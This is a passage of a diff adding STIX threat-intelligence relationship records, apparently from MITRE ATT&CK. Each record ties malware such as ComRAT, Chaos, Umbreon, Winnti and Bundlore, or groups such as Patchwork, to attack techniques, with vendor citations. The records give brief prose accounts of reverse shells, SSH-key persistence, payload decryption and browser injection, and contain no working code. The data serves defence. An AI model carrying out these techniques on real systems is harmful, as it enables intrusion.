+ "id": "relationship--f4303403-0d93-4267-ba4c-a1d4e20d87cd",
+ "type": "relationship",
+ "modified": "2020-07-06T14:40:26.270Z",
+ "created": "2020-06-30T22:35:00.791Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--da5880b4-f7da-4869-85f2-e0aba84b8565",
+ "target_ref": "attack-pattern--e3b6daca-e963-4a69-aee6-ed4fd653ad58",
+ "external_references": [
+ {
+ "source_name": "ESET ComRAT May 2020",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf",
+ "description": "Faou, M. (2020, May). From Agent.btz to ComRAT v4: A ten-year journey. Retrieved June 15, 2020."
+ }
+ ],
+ "description": "[ComRAT](https://attack.mitre.org/software/S0126) can check the victim's default browser to determine which process to inject its communications module into.(Citation: ESET ComRAT May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--31029adf-2b28-4d7f-bdd3-b07f55374eae",
+ "type": "relationship",
+ "modified": "2020-06-30T22:40:28.118Z",
+ "created": "2020-06-30T22:40:28.118Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--da5880b4-f7da-4869-85f2-e0aba84b8565",
+ "target_ref": "attack-pattern--c32f7008-9fea-41f7-8366-5eb9b74bd896",
+ "external_references": [
+ {
+ "source_name": "ESET ComRAT May 2020",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf",
+ "description": "Faou, M. (2020, May). From Agent.btz to ComRAT v4: A ten-year journey. Retrieved June 15, 2020."
+ }
+ ],
+ "description": "[ComRAT](https://attack.mitre.org/software/S0126) can check the default browser by querying HKCR\\http\\shell\\open\\command.(Citation: ESET ComRAT May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--b511900a-9bfe-4f8c-b1e2-b95669a5eaeb",
+ "type": "relationship",
+ "modified": "2020-06-30T22:40:28.140Z",
+ "created": "2020-06-30T22:40:28.140Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "course-of-action--20f6a9df-37c4-4e20-9e47-025983b1b39d",
+ "target_ref": "attack-pattern--8868cb5b-d575-4a60-acb2-07d37389a2fd",
+ "relationship_type": "mitigates",
+ "description": "Mitigation of some variants of this technique could be achieved through the use of stateful firewalls, depending upon how it is implemented.",
+ "id": "relationship--0058d5dd-bf42-4a09-94ff-dfb024b949df",
+ "type": "relationship",
+ "modified": "2020-07-01T18:23:25.245Z",
+ "created": "2020-07-01T18:23:25.245Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "attack-pattern--8868cb5b-d575-4a60-acb2-07d37389a2fd",
+ "target_ref": "attack-pattern--451a9977-d255-43c9-b431-66de80130c8c",
+ "relationship_type": "subtechnique-of",
+ "id": "relationship--624c4ae2-f367-4be2-a584-0fb5ec94c694",
+ "type": "relationship",
+ "modified": "2020-07-01T18:23:25.252Z",
+ "created": "2020-07-01T18:23:25.252Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--5bcd5511-6756-4824-a692-e8bb109364af",
+ "target_ref": "attack-pattern--451a9977-d255-43c9-b431-66de80130c8c",
+ "external_references": [
+ {
+ "source_name": "Chaos Stolen Backdoor",
+ "description": "Sebastian Feldmann. (2018, February 14). Chaos: a Stolen Backdoor Rising Again. Retrieved March 5, 2018.",
+ "url": "http://gosecure.net/2018/02/14/chaos-stolen-backdoor-rising/"
+ }
+ ],
+ "description": "[Chaos](https://attack.mitre.org/software/S0220) provides a reverse shell is triggered upon receipt of a packet with a special string, sent to any port.(Citation: Chaos Stolen Backdoor)",
+ "relationship_type": "uses",
+ "id": "relationship--788ec1d9-9192-46c9-8bc3-7397ccb854df",
+ "type": "relationship",
+ "modified": "2020-07-01T18:30:55.443Z",
+ "created": "2020-07-01T18:30:55.443Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--3d8e547d-9456-4f32-a895-dc86134e282f",
+ "target_ref": "attack-pattern--451a9977-d255-43c9-b431-66de80130c8c",
+ "external_references": [
+ {
+ "source_name": "Umbreon Trend Micro",
+ "description": "Fernando Merc\u00eas. (2016, September 5). Pok\u00e9mon-themed Umbreon Linux Rootkit Hits x86, ARM Systems. Retrieved March 5, 2018.",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/pokemon-themed-umbreon-linux-rootkit-hits-x86-arm-systems/?_ga=2.180041126.367598458.1505420282-1759340220.1502477046"
+ }
+ ],
+ "description": "[Umbreon](https://attack.mitre.org/software/S0221) provides additional access using its backdoor Espeon, providing a reverse shell upon receipt of a special packet.(Citation: Umbreon Trend Micro)",
+ "relationship_type": "uses",
+ "id": "relationship--85af8200-2e4c-4253-a334-0390ac4065f8",
+ "type": "relationship",
+ "modified": "2020-07-01T18:32:47.416Z",
+ "created": "2020-07-01T18:32:47.416Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8787e86d-8475-4f13-acea-d33eb83b6105",
+ "target_ref": "attack-pattern--451a9977-d255-43c9-b431-66de80130c8c",
+ "external_references": [
+ {
+ "source_name": "Chronicle Winnti for Linux May 2019",
+ "url": "https://medium.com/chronicle-blog/winnti-more-than-just-windows-and-gates-e4f03436031a",
+ "description": "Chronicle Blog. (2019, May 15). Winnti: More than just Windows and Gates. Retrieved April 29, 2020."
+ }
+ ],
+ "description": "[Winnti for Linux](https://attack.mitre.org/software/S0430) has used a passive listener, capable of identifying a specific magic value before executing tasking, as a secondary command and control (C2) mechanism.(Citation: Chronicle Winnti for Linux May 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--76625152-3f62-4a1e-a769-5503811b0276",
+ "type": "relationship",
+ "modified": "2020-07-01T18:34:02.855Z",
+ "created": "2020-07-01T18:34:02.855Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--7bef1b56-4870-4e74-b32a-7dd88c390c44",
+ "target_ref": "attack-pattern--1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2",
+ "external_references": [
+ {
+ "source_name": "MacKeeper Bundlore Apr 2019",
+ "url": "https://mackeeper.com/blog/post/610-macos-bundlore-adware-analysis/",
+ "description": "Sushko, O. (2019, April 17). macOS Bundlore: Mac Virus Bypassing macOS Security Features. Retrieved June 30, 2020."
+ }
+ ],
+ "description": "[Bundlore](https://attack.mitre.org/software/S0482) has disguised a malicious .app file as a Flash Player update.(Citation: MacKeeper Bundlore Apr 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--10c609ce-f256-436c-8288-3441cb123fc5",
+ "type": "relationship",
+ "modified": "2020-07-01T21:30:17.251Z",
+ "created": "2020-07-01T20:27:58.395Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--7bef1b56-4870-4e74-b32a-7dd88c390c44",
+ "target_ref": "attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e",
+ "external_references": [
+ {
+ "source_name": "MacKeeper Bundlore Apr 2019",
+ "url": "https://mackeeper.com/blog/post/610-macos-bundlore-adware-analysis/",
+ "description": "Sushko, O. (2019, April 17). macOS Bundlore: Mac Virus Bypassing macOS Security Features. Retrieved June 30, 2020."
+ }
+ ],
+ "description": "[Bundlore](https://attack.mitre.org/software/S0482) has attempted to get users to execute a malicious .app file that looks like a Flash Player update.(Citation: MacKeeper Bundlore Apr 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--a77d7668-db79-46b0-960a-cfa39db781fa",
+ "type": "relationship",
+ "modified": "2020-07-01T21:30:17.328Z",
+ "created": "2020-07-01T20:27:58.407Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--7bef1b56-4870-4e74-b32a-7dd88c390c44",
+ "target_ref": "attack-pattern--d742a578-d70e-4d0e-96a6-02a9c30204e6",
+ "external_references": [
+ {
+ "source_name": "MacKeeper Bundlore Apr 2019",
+ "url": "https://mackeeper.com/blog/post/610-macos-bundlore-adware-analysis/",
+ "description": "Sushko, O. (2019, April 17). macOS Bundlore: Mac Virus Bypassing macOS Security Features. Retrieved June 30, 2020."
+ }
+ ],
+ "description": "[Bundlore](https://attack.mitre.org/software/S0482) has been spread through malicious advertisements on websites.(Citation: MacKeeper Bundlore Apr 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--2ee78986-9275-4248-9fde-125c3312b657",
+ "type": "relationship",
+ "modified": "2020-07-01T21:30:17.318Z",
+ "created": "2020-07-01T20:27:58.429Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--7bef1b56-4870-4e74-b32a-7dd88c390c44",
+ "target_ref": "attack-pattern--a2029942-0a85-4947-b23c-ca434698171d",
+ "external_references": [
+ {
+ "source_name": "MacKeeper Bundlore Apr 2019",
+ "url": "https://mackeeper.com/blog/post/610-macos-bundlore-adware-analysis/",
+ "description": "Sushko, O. (2019, April 17). macOS Bundlore: Mac Virus Bypassing macOS Security Features. Retrieved June 30, 2020."
+ }
+ ],
+ "description": "[Bundlore](https://attack.mitre.org/software/S0482) prompts the user for their credentials.(Citation: MacKeeper Bundlore Apr 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--9480dac9-9192-4966-a622-0ca561b59f16",
+ "type": "relationship",
+ "modified": "2020-07-01T21:30:17.323Z",
+ "created": "2020-07-01T20:35:01.949Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--7bef1b56-4870-4e74-b32a-7dd88c390c44",
+ "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "external_references": [
+ {
+ "source_name": "MacKeeper Bundlore Apr 2019",
+ "url": "https://mackeeper.com/blog/post/610-macos-bundlore-adware-analysis/",
+ "description": "Sushko, O. (2019, April 17). macOS Bundlore: Mac Virus Bypassing macOS Security Features. Retrieved June 30, 2020."
+ }
+ ],
+ "description": "[Bundlore](https://attack.mitre.org/software/S0482) can download and execute new versions of itself.(Citation: MacKeeper Bundlore Apr 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--6b69d848-b3d9-4f8f-96dc-381e1dd793d4",
+ "type": "relationship",
+ "modified": "2020-07-01T21:30:17.324Z",
+ "created": "2020-07-01T20:35:01.953Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--7bef1b56-4870-4e74-b32a-7dd88c390c44",
+ "target_ref": "attack-pattern--a9d4b653-6915-42af-98b2-5758c4ceee56",
+ "external_references": [
+ {
+ "source_name": "MacKeeper Bundlore Apr 2019",
+ "url": "https://mackeeper.com/blog/post/610-macos-bundlore-adware-analysis/",
+ "description": "Sushko, O. (2019, April 17). macOS Bundlore: Mac Virus Bypassing macOS Security Features. Retrieved June 30, 2020."
+ }
+ ],
+ "description": "[Bundlore](https://attack.mitre.org/software/S0482) has leveraged /bin/sh and /bin/bash to execute commands on the victim machine.(Citation: MacKeeper Bundlore Apr 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--2063f611-1da2-4a62-bbb6-38b37580679f",
+ "type": "relationship",
+ "modified": "2020-07-01T21:30:17.370Z",
+ "created": "2020-07-01T20:35:01.969Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--7bef1b56-4870-4e74-b32a-7dd88c390c44",
+ "target_ref": "attack-pattern--ac08589e-ee59-4935-8667-d845e38fe579",
+ "external_references": [
+ {
+ "source_name": "MacKeeper Bundlore Apr 2019",
+ "url": "https://mackeeper.com/blog/post/610-macos-bundlore-adware-analysis/",
+ "description": "Sushko, O. (2019, April 17). macOS Bundlore: Mac Virus Bypassing macOS Security Features. Retrieved June 30, 2020."
+ }
+ ],
+ "description": "[Bundlore](https://attack.mitre.org/software/S0482) can change macOS security settings and browser preferences to enable follow-on behaviors.(Citation: MacKeeper Bundlore Apr 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--fe8efec3-2ab4-497d-8e5a-b2340feddd8f",
+ "type": "relationship",
+ "modified": "2020-07-01T21:30:17.327Z",
+ "created": "2020-07-01T21:05:18.822Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--7bef1b56-4870-4e74-b32a-7dd88c390c44",
+ "target_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
+ "external_references": [
+ {
+ "source_name": "MacKeeper Bundlore Apr 2019",
+ "url": "https://mackeeper.com/blog/post/610-macos-bundlore-adware-analysis/",
+ "description": "Sushko, O. (2019, April 17). macOS Bundlore: Mac Virus Bypassing macOS Security Features. Retrieved June 30, 2020."
+ }
+ ],
+ "description": "[Bundlore](https://attack.mitre.org/software/S0482) has used the ps command to list processes.(Citation: MacKeeper Bundlore Apr 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--1e10af38-1695-45ab-8db2-8cd476a58a45",
+ "type": "relationship",
+ "modified": "2020-07-01T21:30:17.366Z",
+ "created": "2020-07-01T21:05:18.827Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--7bef1b56-4870-4e74-b32a-7dd88c390c44",
+ "target_ref": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c",
+ "external_references": [
+ {
+ "source_name": "MacKeeper Bundlore Apr 2019",
+ "url": "https://mackeeper.com/blog/post/610-macos-bundlore-adware-analysis/",
+ "description": "Sushko, O. (2019, April 17). macOS Bundlore: Mac Virus Bypassing macOS Security Features. Retrieved June 30, 2020."
+ }
+ ],
+ "description": "[Bundlore](https://attack.mitre.org/software/S0482) has used openssl to decrypt AES encrypted payload data. [Bundlore](https://attack.mitre.org/software/S0482) has also used base64 and RC4 with a hardcoded key to deobfuscate data.(Citation: MacKeeper Bundlore Apr 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--68cfc5f9-3c65-4f24-8018-cf811d7b6c9f",
+ "type": "relationship",
+ "modified": "2020-07-01T21:30:17.360Z",
+ "created": "2020-07-01T21:05:18.856Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--7bef1b56-4870-4e74-b32a-7dd88c390c44",
+ "target_ref": "attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d",
+ "external_references": [
+ {
+ "source_name": "MacKeeper Bundlore Apr 2019",
+ "url": "https://mackeeper.com/blog/post/610-macos-bundlore-adware-analysis/",
+ "description": "Sushko, O. (2019, April 17). macOS Bundlore: Mac Virus Bypassing macOS Security Features. Retrieved June 30, 2020."
+ }
+ ],
+ "description": "[Bundlore](https://attack.mitre.org/software/S0482) can execute JavaScript by injecting it into the victim's browser.(Citation: MacKeeper Bundlore Apr 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--d70ae3e8-39e2-4835-9ba6-56dee8d028fc",
+ "type": "relationship",
+ "modified": "2020-07-01T21:30:17.396Z",
+ "created": "2020-07-01T21:05:18.864Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--7bef1b56-4870-4e74-b32a-7dd88c390c44",
+ "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "external_references": [
+ {
+ "source_name": "MacKeeper Bundlore Apr 2019",
+ "url": "https://mackeeper.com/blog/post/610-macos-bundlore-adware-analysis/",
+ "description": "Sushko, O. (2019, April 17). macOS Bundlore: Mac Virus Bypassing macOS Security Features. Retrieved June 30, 2020."
+ }
+ ],
+ "description": "[Bundlore](https://attack.mitre.org/software/S0482) has obfuscated data with base64, AES, RC4, and bz2.(Citation: MacKeeper Bundlore Apr 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--885c54e7-6b1c-4399-a051-1e0b047d6f92",
+ "type": "relationship",
+ "modified": "2020-07-01T21:30:17.393Z",
+ "created": "2020-07-01T21:05:18.859Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--7bef1b56-4870-4e74-b32a-7dd88c390c44",
+ "target_ref": "attack-pattern--d10cbd34-42e3-45c0-84d2-535a09849584",
+ "external_references": [
+ {
+ "source_name": "MacKeeper Bundlore Apr 2019",
+ "url": "https://mackeeper.com/blog/post/610-macos-bundlore-adware-analysis/",
+ "description": "Sushko, O. (2019, April 17). macOS Bundlore: Mac Virus Bypassing macOS Security Features. Retrieved June 30, 2020."
+ }
+ ],
+ "description": "[Bundlore](https://attack.mitre.org/software/S0482) can persist via a LaunchAgent.(Citation: MacKeeper Bundlore Apr 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--72df7e88-84ce-449b-ae0f-a8ceb9316964",
+ "type": "relationship",
+ "modified": "2020-07-01T21:30:17.400Z",
+ "created": "2020-07-01T21:05:18.891Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--7bef1b56-4870-4e74-b32a-7dd88c390c44",
+ "target_ref": "attack-pattern--37b11151-1776-4f8f-b328-30939fbf2ceb",
+ "external_references": [
+ {
+ "source_name": "MacKeeper Bundlore Apr 2019",
+ "url": "https://mackeeper.com/blog/post/610-macos-bundlore-adware-analysis/",
+ "description": "Sushko, O. (2019, April 17). macOS Bundlore: Mac Virus Bypassing macOS Security Features. Retrieved June 30, 2020."
+ }
+ ],
+ "description": "[Bundlore](https://attack.mitre.org/software/S0482) can use AppleScript to inject malicious JavaScript into a browser.(Citation: MacKeeper Bundlore Apr 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--cb53d2b5-6606-4597-b5e9-d9c114e2607e",
+ "type": "relationship",
+ "modified": "2020-07-01T21:30:17.395Z",
+ "created": "2020-07-01T21:05:18.901Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--7bef1b56-4870-4e74-b32a-7dd88c390c44",
+ "target_ref": "attack-pattern--573ad264-1371-4ae0-8482-d2673b719dba",
+ "external_references": [
+ {
+ "source_name": "MacKeeper Bundlore Apr 2019",
+ "url": "https://mackeeper.com/blog/post/610-macos-bundlore-adware-analysis/",
+ "description": "Sushko, O. (2019, April 17). macOS Bundlore: Mac Virus Bypassing macOS Security Features. Retrieved June 30, 2020."
+ }
+ ],
+ "description": "[Bundlore](https://attack.mitre.org/software/S0482) can persist via a LaunchDaemon.(Citation: MacKeeper Bundlore Apr 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--a9f9bef5-31f0-44bf-bba5-4c13a5eda5ac",
+ "type": "relationship",
+ "modified": "2020-07-01T21:30:17.406Z",
+ "created": "2020-07-01T21:05:18.895Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--7bef1b56-4870-4e74-b32a-7dd88c390c44",
+ "target_ref": "attack-pattern--6b57dc31-b814-4a03-8706-28bc20d739c4",
+ "external_references": [
+ {
+ "source_name": "MacKeeper Bundlore Apr 2019",
+ "url": "https://mackeeper.com/blog/post/610-macos-bundlore-adware-analysis/",
+ "description": "Sushko, O. (2019, April 17). macOS Bundlore: Mac Virus Bypassing macOS Security Features. Retrieved June 30, 2020."
+ }
+ ],
+ "description": "[Bundlore](https://attack.mitre.org/software/S0482) creates a new key pair with ssh-keygen and drops the newly created user key in authorized_keys to enable remote login.(Citation: MacKeeper Bundlore Apr 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--6723c87e-f60a-465f-96cd-78d63d17ba01",
+ "type": "relationship",
+ "modified": "2020-07-01T21:30:17.399Z",
+ "created": "2020-07-01T21:19:30.513Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--7bef1b56-4870-4e74-b32a-7dd88c390c44",
+ "target_ref": "attack-pattern--cc3502b5-30cc-4473-ad48-42d51a6ef6d1",
+ "external_references": [
+ {
+ "source_name": "MacKeeper Bundlore Apr 2019",
+ "url": "https://mackeeper.com/blog/post/610-macos-bundlore-adware-analysis/",
+ "description": "Sushko, O. (2019, April 17). macOS Bundlore: Mac Virus Bypassing macOS Security Features. Retrieved June 30, 2020."
+ }
+ ],
+ "description": "[Bundlore](https://attack.mitre.org/software/S0482) has used Python scripts to execute payloads.(Citation: MacKeeper Bundlore Apr 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--677878af-62d4-4407-bbe6-551b7906a366",
+ "type": "relationship",
+ "modified": "2020-07-01T21:30:17.403Z",
+ "created": "2020-07-01T21:19:30.521Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--7bef1b56-4870-4e74-b32a-7dd88c390c44",
+ "target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161",
+ "external_references": [
+ {
+ "source_name": "MacKeeper Bundlore Apr 2019",
+ "url": "https://mackeeper.com/blog/post/610-macos-bundlore-adware-analysis/",
+ "description": "Sushko, O. (2019, April 17). macOS Bundlore: Mac Virus Bypassing macOS Security Features. Retrieved June 30, 2020."
+ }
+ ],
+ "description": "[Bundlore](https://attack.mitre.org/software/S0482) uses HTTP requests for C2.(Citation: MacKeeper Bundlore Apr 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--fbbaf901-4d1a-41e0-9040-78185113ffdf",
+ "type": "relationship",
+ "modified": "2020-07-01T21:30:17.398Z",
+ "created": "2020-07-01T21:19:30.577Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--7bef1b56-4870-4e74-b32a-7dd88c390c44",
+ "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
+ "external_references": [
+ {
+ "source_name": "MacKeeper Bundlore Apr 2019",
+ "url": "https://mackeeper.com/blog/post/610-macos-bundlore-adware-analysis/",
+ "description": "Sushko, O. (2019, April 17). macOS Bundlore: Mac Virus Bypassing macOS Security Features. Retrieved June 30, 2020."
+ }
+ ],
+ "description": "[Bundlore](https://attack.mitre.org/software/S0482) will enumerate the macOS version to determine which follow-on behaviors to execute.(Citation: MacKeeper Bundlore Apr 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--132c7780-3fa4-478b-b037-f2c1ad99d98f",
+ "type": "relationship",
+ "modified": "2020-07-01T21:30:17.405Z",
+ "created": "2020-07-01T21:19:30.582Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--7bef1b56-4870-4e74-b32a-7dd88c390c44",
+ "target_ref": "attack-pattern--e3b6daca-e963-4a69-aee6-ed4fd653ad58",
+ "external_references": [
+ {
+ "source_name": "MacKeeper Bundlore Apr 2019",
+ "url": "https://mackeeper.com/blog/post/610-macos-bundlore-adware-analysis/",
+ "description": "Sushko, O. (2019, April 17). macOS Bundlore: Mac Virus Bypassing macOS Security Features. Retrieved June 30, 2020."
+ }
+ ],
+ "description": "[Bundlore](https://attack.mitre.org/software/S0482) has the ability to enumerate what browser is being used as well as version information for Safari.(Citation: MacKeeper Bundlore Apr 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--91038a74-575b-4f2e-9dba-767b50b8e4ab",
+ "type": "relationship",
+ "modified": "2020-07-01T21:30:17.402Z",
+ "created": "2020-07-01T21:19:30.586Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--17862c7d-9e60-48a0-b48e-da4dc4c3f6b0",
+ "target_ref": "attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9",
+ "external_references": [
+ {
+ "url": "http://www.symantec.com/connect/blogs/patchwork-cyberespionage-group-expands-targets-governments-wide-range-industries",
+ "description": "Hamada, J.. (2016, July 25). Patchwork cyberespionage group expands targets from governments to wide range of industries. Retrieved August 17, 2016.",
+ "source_name": "Symantec Patchwork"
+ },
+ {
+ "source_name": "TrendMicro Patchwork Dec 2017",
+ "description": "Lunghi, D., et al. (2017, December). Untangling the Patchwork Cyberespionage Group. Retrieved July 10, 2018.",
+ "url": "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf"
+ },
+ {
+ "url": "https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/",
+ "description": "Meltzer, M, et al. (2018, June 07). Patchwork APT Group Targets US Think Tanks. Retrieved July 16, 2018.",
+ "source_name": "Volexity Patchwork June 2018"
+ },
+ {
+ "source_name": "Unit 42 BackConfig May 2020",
+ "url": "https://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/",
+ "description": "Hinchliffe, A. and Falcone, R. (2020, May 11). Updated BackConfig Malware Targeting Government and Military Organizations in South Asia. Retrieved June 17, 2020."
+ }
+ ],
+ "description": "[Patchwork](https://attack.mitre.org/groups/G0040) has used spearphishing with links to try to get users to click, download and open malicious files.(Citation: Symantec Patchwork)(Citation: TrendMicro Patchwork Dec 2017)(Citation: Volexity Patchwork June 2018)(Citation: Unit 42 BackConfig May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--67154159-cd44-4d9c-ae84-c82a8cd5ee58",
+ "type": "relationship",
+ "modified": "2020-07-03T22:15:24.515Z",
+ "created": "2020-07-03T22:15:24.515Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--92d5b3fd-3b39-438e-af68-770e447beada",
+ "target_ref": "malware--e48df773-7c95-4a4c-ba70-ea3d15900148",
+ "external_references": [
+ {
+ "source_name": "ClearSky Charming Kitten Dec 2017",
+ "description": "ClearSky Cyber Security. (2017, December). Charming Kitten. Retrieved December 27, 2017.",
+ "url": "http://www.clearskysec.com/wp-content/uploads/2017/12/Charming_Kitten_2017.pdf"
+ }
